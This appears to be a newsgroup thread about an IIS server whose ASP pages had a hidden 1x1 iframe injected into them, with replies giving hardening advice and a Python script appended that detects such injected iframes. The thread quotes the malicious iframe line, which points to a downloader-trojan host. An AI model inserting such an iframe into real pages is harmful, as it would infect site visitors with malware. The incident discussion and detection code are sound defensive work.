Virus in IFRAME injected into our ASP pages (downloader trojan on client)

Our website was compromised sometime in the last few days, but our Antivirus (Symantec Corporate) when run on the server doesn't detect it.

It is a Windows Server 2003 Standard server, running SP1 and all the latest patches. IIS sends down a website to the user with IFRAMEs injected into the HTML:

<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php width=1 height=1></iframe></TD></A></TR></TABLE></TD>

The iframe code above pointing to xaqjlyswly.biz does not come from our code. I looked at the ASP function that generates this link and there is nothing there that would put that on the page.

The iframe tries to get the user's browser to download the Downloader virus which, according to Symantec, "connects to the Internet and downloads other Trojan horses":
http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99

My local antivirus on my machine caught Downloader getting installed after browsing the site on the infected server.

I used Agent Ransack to look for the string ".biz" across all our websites' source code. The string wasn't found anywhere.

That all leads me to believe that something is getting injected into the code before it is sent to the end user.

I found an older virus that has similar characteristics called Download.Ject which infected IIS also. I followed Microsoft's suggestions for detecting Download.Ject and we don't have it.

Any ideas?

Hi Paul,
I believe the current situation indicates your web server got hacked/attacked. For such kind of urgent cases of Virus/Trojan, I would like to suggest that you contact Microsoft Customer Service and Support services as well as some third-party security and anti-virus services vendor like Symantec for assistance. You can call our support center via telephone so that a dedicated Support Professional can assist with this request. To obtain the phone numbers for specific technology request please take a look at the web site listed below.

http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHONENUMBERS

If you are outside the US please see http://support.microsoft.com for regional support phone numbers.

Thanks.

Sincerely,
WenJun Zhang
Microsoft Online Community Support

==================================================
Get notification to my posts through email? Please refer to:
http://msdn.microsoft.com/subscriptions/managednewsgroups/default.aspx#notifications

Note: The MSDN Managed Newsgroup support offering is for non-urgent issues where an initial response from the community or a Microsoft Support Engineer within 1 business day is acceptable. Please note that each follow up response may take approximately 2 business days as the support professional working with you may need further investigation to reach the most efficient resolution. The offering is not appropriate for situations that require urgent, real-time or phone-based interactions or complex project analysis and dump analysis issues. Issues of this nature are best handled working with a dedicated Microsoft Support Engineer by contacting Microsoft Customer Support Services (CSS) at:
http://msdn.microsoft.com/subscriptions/support/default.aspx
==================================================
This posting is provided "AS IS" with no warranties, and confers no rights.

We had the same problem on our windows 2003 server today.
We cannot find any information anywhere. Any ideas???

Paul Oliver wrote:

> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
> CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> width=1 height=1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.
>
> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses"
>
> http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>
> Any ideas?

In article <uelbG$kGHHA.***@TK2MSFTNGP02.phx.gbl>,
PaulOliver@noemail.noemail says...

> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
> CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> width=1 height=1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.

The reason that Symantec didn't detect it on the server is because the threat (malware) is not on your server, it's on the remote server.

> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses"
>
> http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>
> Any ideas?

Put a real firewall in front of your server, block all foreign subnets not required, rename the administrator account and disable all accounts not needed, patch the server, etc... Follow ALL of the recommendations that secure your server.

What services, other than HTTP did you expose?

--
spam999free@rrohio.com
remove 999 in order to email me

We had to reinstall IIS on the server and it did the trick.
By the way, we tried windows defender and windows removing tools, both didn't find anything. And after our tests, IIS was really compromised. Any website running asp or aspx pages injects the iframe code. The hack seems to have been at the core of IIS. ISAPI filter deactivation didn't do the trick.

Any idea anyone what it was?

Leythos wrote:

> In article <uelbG$kGHHA.***@TK2MSFTNGP02.phx.gbl>,
> PaulOliver@noemail.noemail says...
> > Our website was compromised sometime in the last few days, but our
> > Antivirus (Symantec Corporate) when run on the server doesn't detect it.
> >
> > It is a Windows Server 2003 Standard server, running SP1 and all the
> > latest patches. IIS sends down a website to the user with IFRAMEs
> > injected into the HTML:
> >
> > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
> > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> > width=1 height=1></iframe></TD></A></TR></TABLE></TD>
> >
> > The iframe code above pointing to xaqjlyswly.biz does not come from our
> > code. I looked at the ASP function that generates this link and there
> > is nothing there that would put that on the page.
>
> The reason that Symantec didn't detect it on the server is because the
> threat (malware) is not on your server, it's on the remote server.
>
> > The iframe tries to get the user's browser to download the Downloader
> > virus which, according to Symantec "connects to the Internet and
> > downloads other Trojan horses"
> >
> > http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
> >
> > My local antivirus on my machine caught downloader getting installed
> > after browsing the site on the infected server.
> >
> > I used Agent Ransack to look for the string ".biz" across all our
> > websites source code. The string wasn't found anywhere.
> >
> > That all leads me to believe that something is getting injected into the
> > code before it is sent to the end user.
> >
> > I found an older virus that has similar characteristics called
> > Download.Ject which infected IIS also. I followed Microsoft's
> > suggestions for detecting Download.Ject and we don't have it.
> >
> > Any ideas?
>
> Put a real firewall in front of your server, block all foreign subnets
> not required, rename the administrator account and disable all accounts
> not needed, patch the server, etc... Follow ALL of the recommendations
> that secure your server.
>
> What services, other than HTTP did you expose?
>
> --
> spam999free@rrohio.com
> remove 999 in order to email me

In article <1165843984.956869.252***@16g2000cwy.googlegroups.com>,
dc***@dgmdata.com says...

> We had to reinstall IIS on the server and it did the trick.

I don't think so, sure it got it working again, but, reinstalling IIS does not resolve the root cause.

> By the way, we tried windows defender and windows removing tools, both
> didn't find anything. And after our tests, IIS was really compromised.
> Any website running asp or aspx pages injects the iframe code. The hack
> seems to have been at the core of IIS. ISAPI filter deactivation
> didn't do the trick.

Windows Defender is worthless and unless you setup your server properly it will happen again. I've had hundreds of IIS based webservers online since the late days of NT4 and never had one compromised. You need to properly configure and properly firewall your server, and you need to properly code sites so that you don't expose your site to exploits in website code.

> Any idea anyone what it was?

No, but you might be able to find information on google.com

--
spam999free@rrohio.com
remove 999 in order to email me
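Paul's grep of the source tree finding nothing, and dc's observation that every ASP/ASPX page served carried the frame, both point at injection at serve time rather than in the site code. The check below is an added example, not anything posted in the thread: it parses the HTML IIS actually returned next to the template on disk and reports 1x1 off-site iframes that exist only in the served copy; the sample markup, the site_host value and the domain malware.invalid are constructed placeholders.

```python
# Added example, not from the thread: report hidden off-site iframes that are
# in the HTML IIS serves but not in the on-disk source (constructed samples,
# placeholder domain malware.invalid).
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collect (src, width, height) of each <iframe>; html.parser accepts the
    unquoted attribute syntax used by the injected tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            a = {k: (v or "") for k, v in attrs}
            self.iframes.append((a.get("src", ""), a.get("width", ""), a.get("height", "")))

def _tiny(value):
    """True for a width/height of 1 pixel or less (the 1x1 hidden frame)."""
    v = value.strip()
    return v.isdigit() and int(v) <= 1

def hidden_offsite_iframes(html, site_host):
    """src of iframes pointing at another host and rendered at 1x1 or smaller.
    Relative src values have no hostname and count as same-site."""
    p = IframeCollector()
    p.feed(html)
    return [src for src, w, h in p.iframes
            if urlparse(src).hostname not in (None, site_host)
            and _tiny(w) and _tiny(h)]

def injected_iframes(served_html, source_html, site_host):
    """Hidden off-site iframes in the served page that the source on disk lacks:
    evidence of injection at serve time, invisible to a grep of the source tree."""
    served = set(hidden_offsite_iframes(served_html, site_host))
    source = set(hidden_offsite_iframes(source_html, site_host))
    return sorted(served - source)

# Constructed on-disk template: a full-size off-site embed and a same-site 1x1
# frame, neither of which should be reported.
SOURCE_HTML = (
    '<TD><A HREF="news.asp?ID=194" TARGET=_self CLASS="ltblue"></a></TD>'
    '<iframe src="http://maps.example.net/embed" width=400 height=300></iframe>'
    '<iframe src="/hit.asp" width=1 height=1></iframe>'
)
# Constructed served copy: the same markup with a 1x1 off-site frame injected.
SERVED_HTML = SOURCE_HTML.replace(
    "</a>", "</a><iframe src=http://malware.invalid/dl/x.php width=1 height=1></iframe>", 1)
```

Run it against a response captured from the server (for example with a non-browser client so the client-side antivirus is not tripped) and the matching template, calling injected_iframes(served, source, "your.site.host"); a non-empty result is the serve-time injection the thread describes.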